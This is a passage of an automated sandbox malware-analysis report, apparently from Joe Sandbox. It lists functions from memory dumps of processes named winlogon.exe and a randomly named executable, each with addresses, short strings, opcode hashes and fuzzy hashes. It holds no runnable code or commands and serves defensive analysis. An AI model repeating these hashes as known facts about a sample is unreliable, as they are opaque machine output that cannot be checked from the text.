Instruction ID: 0032f4905f427447f9c3b5ad3223a654b584b408bb4ffdae4c0d9d314f04c27c
Opcode Fuzzy Hash: cf1d09a54c5f66c9f7a83537e81e6fe95299c91ada44a83c90181223d58f4f7f
Instruction Fuzzy Hash: 50E0EC30D1A5198EE754FB18D815BAEAAB1FF44344F5001B5D00DA32C2CF396D408F54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F28EA7 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction ID: f5223aa2995eb63d7c39ec09813f4fa29f41e51575a82e4df61425727ede4256
Opcode Fuzzy Hash: 487edb672a762525586fd55eb3a7895dc7cc08b8751fd058bf0e3449a35b2169
Instruction Fuzzy Hash: BDD06C70A09A298EEBA4EB0498547AAB261FB58242F1005EB840DE72D1EE752A808F04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF848F31001 Relevance: 7.6, Strings: 6, Instructions: 131COMMON

Download Yara Rule

Strings

", xrefs: 00007FF848F3129E
{, xrefs: 00007FF848F31001
[, xrefs: 00007FF848F312E4
&, xrefs: 00007FF848F31A12
", xrefs: 00007FF848F31A67
/, xrefs: 00007FF848F31870

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID: "$"$&$/$[${
API String ID: 0-683516320
Opcode ID: 76e8b2553306c7a762bf02d96e58d16827ac713ada0203a758630aacac3eafb9
Instruction ID: ba94b4a793520b99a613a0d6aee9a399129d56853c4ba83a2ea382b7772abf1f
Opcode Fuzzy Hash: 76e8b2553306c7a762bf02d96e58d16827ac713ada0203a758630aacac3eafb9
Instruction Fuzzy Hash: 3A519370D082298EEB68EF55D8947BDB7B1AF54345F2040BAE05EA72C1CB389984DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F3199B Relevance: 5.1, Strings: 4, Instructions: 76COMMON

Download Yara Rule

Strings

&, xrefs: 00007FF848F31A12
", xrefs: 00007FF848F31A67
}, xrefs: 00007FF848F319DF
/, xrefs: 00007FF848F31870

Memory Dump Source

Source File: 00000023.00000002.2207999288.00007FF848F31000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ff848f31000_winlogon.jbxd

Similarity

API ID:
String ID: "$&$/$}
API String ID: 0-3572482012
Opcode ID: c0b9440c54c56e73e76cde5c4196e37fb96f94aa2c2bcbc44ecf7b88862913c3
Instruction ID: 6fc6074dab043d42fd7019f4b8004a4cbefa592b3d68ebbe932ee08120f4b97c
Opcode Fuzzy Hash: c0b9440c54c56e73e76cde5c4196e37fb96f94aa2c2bcbc44ecf7b88862913c3
Instruction Fuzzy Hash: 4431E274D082298FDBA8EF54C8907FDB7B1FB54341F1045AAD04AA72D1DB34AA94CF44

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: winlogon.exePID: 7208, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F20A01 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

(vH, xrefs: 00007FF848F20A70

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID: (vH
API String ID: 0-1172161155
Opcode ID: 7af558393585c5a14525ebbc395224368226753cd9693b87410f881ec0eb293a
Instruction ID: 90abc12b46ac33bf1d65867a315bf5f71403bab63e7ced0445713940210d3cff
Opcode Fuzzy Hash: 7af558393585c5a14525ebbc395224368226753cd9693b87410f881ec0eb293a
Instruction Fuzzy Hash: CE115B32D0854E9FE780FB68D8492B97BE0FF98380F8005B6D808C6196EF39A5448B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2118D Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F211FD

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: e767a72399af6827ed62908f8e43f397686144fb80d700ace42b1fbe5598b1de
Instruction ID: 5bc146f343fdb91cdfbf680fb8865c25435eeb6fe2fe53f1c4a541a6d2634dca
Opcode Fuzzy Hash: e767a72399af6827ed62908f8e43f397686144fb80d700ace42b1fbe5598b1de
Instruction Fuzzy Hash: E611C171D0D64A4EEB59EBA498692B97BE4FF69341F1404BED01AC60C2EF3A6584C708

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F211A0 Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

`yH, xrefs: 00007FF848F211FD

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID: `yH
API String ID: 0-612818259
Opcode ID: 343806ddacc0faf0db624dd1aca6e4d78101da1c7341effdde1f21ccaecdf304
Instruction ID: adaa800259c4fda3e785a9717d800a049cb45e9e0315913fd882fb65216013cd
Opcode Fuzzy Hash: 343806ddacc0faf0db624dd1aca6e4d78101da1c7341effdde1f21ccaecdf304
Instruction Fuzzy Hash: A8F0F671D1DA4E8EFB58FBA4A8193FA7AE8FF55345F00043AE41AC60C1EF3925948649

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F216A8 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5c2150f0b7d55f4c77da201018cc7040057b434896a127f42e2277b3cedb14
Instruction ID: 53238f7e6b1e8fb90de9ec97d97112cf13ac621c42b603bddbac678aa03f50db
Opcode Fuzzy Hash: 2a5c2150f0b7d55f4c77da201018cc7040057b434896a127f42e2277b3cedb14
Instruction Fuzzy Hash: 2D91AC31A0CA8A8FDB59EF58A8515B977E2FF98754F14017AD44DC32C2CE35B842C789

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F235FE Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05c48699632a1c59bd0ebd4c074faf140f671c24a862c0608934b1b8df0e5dfb
Instruction ID: f245ab76cf841753070ef1f0029197bc81880a845195755aa8776afc007482c8
Opcode Fuzzy Hash: 05c48699632a1c59bd0ebd4c074faf140f671c24a862c0608934b1b8df0e5dfb
Instruction Fuzzy Hash: B8718E71E1994E8EE794EB6CE8557A9BFE1FF99354F50027AC009C32D6DFA918018B01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F21C6D Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2190d35f930a1ef0d647cff247795910559993caeae45ba3e3fa5f11d17a508
Instruction ID: f0311d55294df3263fb9cb6bfcd7cb71a8e9b4ce9bbf6388cb5a7d1a6ec062e5
Opcode Fuzzy Hash: b2190d35f930a1ef0d647cff247795910559993caeae45ba3e3fa5f11d17a508
Instruction Fuzzy Hash: B251BF31A0CA898FDB48EF5898955BA77E2FF98754F14017ED44AC32C1CF35A8428789

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F231C1 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e6765422003abccc41599b52faf2bec355a817b6c1125f790b42f47206efc6f
Instruction ID: 20e7b60ffbb4fc96e961348b98414585a3607b1efa3cd33ae22c1a53216a9f70
Opcode Fuzzy Hash: 8e6765422003abccc41599b52faf2bec355a817b6c1125f790b42f47206efc6f
Instruction Fuzzy Hash: 0E5104B0D0860D8FEB54EB98E4986EDBBF1EF48340F50407AD409E72E2DB39A945CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F22085 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c9e3bb889d37f0c929ec4e90db1bec128fe43849fec0be76c4f220536e52aed
Instruction ID: cbe0daa1e30db333eb74748ab6febd0791d2b1ee795358b5cc86c527c27ff965
Opcode Fuzzy Hash: 0c9e3bb889d37f0c929ec4e90db1bec128fe43849fec0be76c4f220536e52aed
Instruction Fuzzy Hash: C7414631E0DA4A4FE355EB78A8455B9FBE0EF89390F0505BBD44CC71E2DF29A8418355

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F222BB Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6f801f9dcdb2823cc7035d7019ad5b8b46ea362b86a449409c8e9be19f4e580
Instruction ID: ad9163ce4dbdc3c2b86de707dda5ee54f42c4561bee48b8a3e3ef7427f3df550
Opcode Fuzzy Hash: f6f801f9dcdb2823cc7035d7019ad5b8b46ea362b86a449409c8e9be19f4e580
Instruction Fuzzy Hash: 53411831D0C6298EEB64EB54E8157FCB2B0BF45340F5045BAC45EA22D2DF3A2A94CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F232F5 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d3ddadc0938b2e663cbb2772b64b05a6a1dcd834eb719ce492af6660f48371
Instruction ID: ccc0577df8a1bfd05c59c9f75e15b5dec5ad4f66e4bc6654a605aed1f608da26
Opcode Fuzzy Hash: b2d3ddadc0938b2e663cbb2772b64b05a6a1dcd834eb719ce492af6660f48371
Instruction Fuzzy Hash: B621F670D0891D8FEB94EB98D494AECBBF1FF58340F50406AD009E72E1CB396940DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F233CF Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c77580d9e88cfd40d16d025b69b68d1e92e2ee19642ba280c5613a446e4edcb
Instruction ID: f24aa4bafad83707f3942e2afcb269489e72d1d1e84b851aa43deba2031bde28
Opcode Fuzzy Hash: 7c77580d9e88cfd40d16d025b69b68d1e92e2ee19642ba280c5613a446e4edcb
Instruction Fuzzy Hash: 0E219D7084D68A8FD743AB7888586A97FF0FF16340F0904FAD049CB0B2EB399555C712

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F21F39 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 596e4a2ddd5c614a87b054d0522caf6391feb577c4932319d4ed6c9057e369ab
Instruction ID: 77a0e225355ea68218cc2fa2ba8c03869d95f9feb10226c0723acea52ac8f966
Opcode Fuzzy Hash: 596e4a2ddd5c614a87b054d0522caf6391feb577c4932319d4ed6c9057e369ab
Instruction Fuzzy Hash: C2115E2180E2D15EEB2367B828650616F945F03264F2D46FBD0E8CB0E3D60E6889C30A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2085D Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c818e8a24a74271f298818d6e80805422978de905abfcfcb66521d998b5db77e
Instruction ID: 1a3fdb797ba2e8a222ebc13656544fe3ff37d6c20c6760d9eccf7dcd220021ba
Opcode Fuzzy Hash: c818e8a24a74271f298818d6e80805422978de905abfcfcb66521d998b5db77e
Instruction Fuzzy Hash: F5012232D0D68E9EE742FB78A8885FA7BE0FF85340F2504B2D848C60D2EF21A4458395

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2359B Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47460e923325a5f8fa34e3979aeb36b4bfeb578e628af57e71976189a53fc679
Instruction ID: aa395119846a4536b95d140c5e225c74cd8beb9a0628496dcfd052869c37e8a9
Opcode Fuzzy Hash: 47460e923325a5f8fa34e3979aeb36b4bfeb578e628af57e71976189a53fc679
Instruction Fuzzy Hash: 1C1182B090D58B4EEB59AB2CE5166B977A0FF19345F0408BDC00ED24E2DF3A64018715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F234F5 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bf360dd601310a48aeb8d3a218272608d0603ff9b1e97e98df321ee45ed24b9
Instruction ID: ff7e0bb881d9c4ba911f3323ba9947e4facd63970502d3626453f69cb223f050
Opcode Fuzzy Hash: 3bf360dd601310a48aeb8d3a218272608d0603ff9b1e97e98df321ee45ed24b9
Instruction Fuzzy Hash: 7C113CB091868E8FDB59EF68945A6B97BA0FF18301F4404BAD41DD61A1DB36A5408705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F22E61 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b1dc7d65568944ce768a8dceff4f20e08e22cc6d8f0a687937ac6dac2309ed7
Instruction ID: 0a61b1c68141a134a0504495b4cd64380ac9b535a97929d2a5ea3f617db3492a
Opcode Fuzzy Hash: 1b1dc7d65568944ce768a8dceff4f20e08e22cc6d8f0a687937ac6dac2309ed7
Instruction Fuzzy Hash: 75018B30D0DA8E8FE751FB6898996A9BBE0FF59341F0508B6D40CCB1E2EB39E4448705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F205D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455fa3aaf9da20c73db0b933dcbf945882d14e5c393eb5c86f393afb75e6b2a5
Instruction ID: 247e03311bf61ea5b4fb3ce988cdabb1528765a4c2be3cb1980552521a32e897
Opcode Fuzzy Hash: 455fa3aaf9da20c73db0b933dcbf945882d14e5c393eb5c86f393afb75e6b2a5
Instruction Fuzzy Hash: B5018C3494850E8FEB48EF64D0596FA77A1FF58345F10047AD40EC21D0CB32B5A0CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F2283D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5d0e9e11ebf52b69c4e2dc8500c82664d710be9d98e628f30da0b6ac6c7b9db
Instruction ID: f95f4bd1f54e7b088a9979714df20b9cbee4c8a36bd6c778331829fcdcb86ff8
Opcode Fuzzy Hash: b5d0e9e11ebf52b69c4e2dc8500c82664d710be9d98e628f30da0b6ac6c7b9db
Instruction Fuzzy Hash: 3601B83080D64E8FE785BBA898882E9BBE0FF19341F1108B7D408C60A2EB39E0408701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F22ED9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41bba34809ac99432ae78c5331a4c3be8e16732d389db9b15e4cd76e74902586
Instruction ID: f958b565d0da5d5c0b0f17f688774db20d571ce9d9c0daf720e96739ed88f03b
Opcode Fuzzy Hash: 41bba34809ac99432ae78c5331a4c3be8e16732d389db9b15e4cd76e74902586
Instruction Fuzzy Hash: 4C017C31D1D6898FE742BB7498592A9BBE0FF5A340F4608B7D408CB0E6EB39A5448711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F20608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68d8b670d5775d88355a69af7471e960be5c2599bd5d128764f9b99d40341a50
Instruction ID: c68dcafeed1bf77198199b695eef4bb4b2f69cb0069323932624f6194ab897a4
Opcode Fuzzy Hash: 68d8b670d5775d88355a69af7471e960be5c2599bd5d128764f9b99d40341a50
Instruction Fuzzy Hash: A301693091C60E9EEB59FBA494586BEB6A1FF18345F50087EE40EC61D1DF36A590C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F20610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec56856dcdaa8670ab28c5361cb777a48188571e4052506bf75f12bc80acad90
Instruction ID: e7a93d8a6f69ef5446d71d040b095d93e909067e5499fff0350c7fe3b08afaf0
Opcode Fuzzy Hash: ec56856dcdaa8670ab28c5361cb777a48188571e4052506bf75f12bc80acad90
Instruction Fuzzy Hash: F2016930918A0E9FEB59EB6494592F9B7E0FF18345F20087EE80EC21D1DF3AA550C614

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F21BED Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b7d541edbaaef6b8b5ee9d00e6b38dae502c0d890f2e305098be488442acb7b
Instruction ID: df80ffa4333f6f88a0de7da8f6ca81e9f8f13f47747efa15f7ef5f3b5d14e545
Opcode Fuzzy Hash: 6b7d541edbaaef6b8b5ee9d00e6b38dae502c0d890f2e305098be488442acb7b
Instruction Fuzzy Hash: 8F01D13080D68D8FEB99EF6494592F93BA0FF55301F4401BEE808C71D2DB36A490C789

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F205D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecdfec3982a9184e033be1d1f497bfd813969fbc981dae94ce96ccbfbb5e5b7e
Instruction ID: a9cc33d3bde4bb20d952d65632bcacafedbc2e4d036f88b725cfa0099390ea15
Opcode Fuzzy Hash: ecdfec3982a9184e033be1d1f497bfd813969fbc981dae94ce96ccbfbb5e5b7e
Instruction Fuzzy Hash: 6CF0AF3084E64E8FEB48AF64A4052FA77A4EF15349F10053AE80DC21C1DB36A4A0CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F22759 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bedb8203670231f98933a5253f497aae2fa801abc983754e7aade16bdfe8252
Instruction ID: 1d4ac97ad696546681009e5757349fbadeaeb5741b8abb8c6a732eb59e240a54
Opcode Fuzzy Hash: 5bedb8203670231f98933a5253f497aae2fa801abc983754e7aade16bdfe8252
Instruction Fuzzy Hash: 69F0F63180E38A8FEB5AAF7498682B97F61FF16301F4508FAD409C61D2DB39A404C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F227CD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aa3bb70f5e4b052e4a21583add464e80a4d7a6fbc3d38833a9a635a779067b9
Instruction ID: 980ce00d37e422c42ba4f6b4c9a53e8f49251914fea29bec0d7926aacf0363ae
Opcode Fuzzy Hash: 8aa3bb70f5e4b052e4a21583add464e80a4d7a6fbc3d38833a9a635a779067b9
Instruction Fuzzy Hash: 4AF0903080E68D8FEB59AF6498191F9BBA0FF15341F4409BAD809C60D2DB3AD554C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F21710 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction ID: 63c3783ce78bb149f41a8a6bce26df3978d0eb3fb6fb664055e62e820f5b98b2
Opcode Fuzzy Hash: 3edcd640d88b40015f0de0df0a0e549db975d9348add14aa2e4d1e4220305169
Instruction Fuzzy Hash: 5EE06D30E0D9124EEA64B398A08467861D19F44384FB88274F03CCA1E1EB2EFCC2C20C

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F251AE Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction ID: 0922b8fcb3fb5b7a72493e894b85ba2a29af6d63b12639ae94509f0a99eb8be4
Opcode Fuzzy Hash: 3266d8a40465b9dfa420b565482d1afff400db45b785ab8e3b603c6d57e198d7
Instruction Fuzzy Hash: 84E02670D19E1D8EEBF4EB089C50BB9B6B1BB58642F5000EAC00DE2280DE352A809F04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F20FA5 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2207732404.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_7ff848f20000_winlogon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d9771067c2f0dbad7331907d3a4ff9766b98fc6e24f600b41e1f5c64f45e9cb
Instruction ID: 8ca33dfabd8c1453e81727a97ae031d0e00a24030add81aeeae9d72c64773b2e
Opcode Fuzzy Hash: 8d9771067c2f0dbad7331907d3a4ff9766b98fc6e24f600b41e1f5c64f45e9cb
Instruction Fuzzy Hash: 2AE0EC30D1A5198EE754FB18D851BAEAAB1FF44344F5001B5D00DE32C2CF396D408F54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: QeWHGGzCXwoQygZUiDI.exePID: 7760, Parent PID: 1028COMMON

Executed Functions

Function 00007FF848F2139C Relevance: 3.8, Strings: 3, Instructions: 76COMMON

Download Yara Rule

Strings

/, xrefs: 00007FF848F21870
", xrefs: 00007FF848F21602
., xrefs: 00007FF848F215CA

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f21000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID: "$.$/
API String ID: 0-983106565
Opcode ID: 4b4e9784e2a989b949b159f12efcc76565d2edab401087f807cbf20e80bd0776
Instruction ID: a5d3b4d5be3983c36ca16b5558ce61f1f714088711142ac592619612ccd199f7
Opcode Fuzzy Hash: 4b4e9784e2a989b949b159f12efcc76565d2edab401087f807cbf20e80bd0776
Instruction Fuzzy Hash: 6231F234D086598EEBA8EF54C8987EDB3B1FF54341F1045AAC41EAA291CB796A84CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F12085 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848F1210B

Memory Dump Source

Source File: 00000025.00000002.2236633517.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_7ff848f10000_QeWHGGzCXwoQygZUiDI.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: c5f9b6be4fba16114b99e106fb00c26c0f2f709fb47ad55846ef54f676703247
Instruction ID: caa9e6079b3b0f969772c6730a51d527828f7a358f9205fc699f9b7684601b33
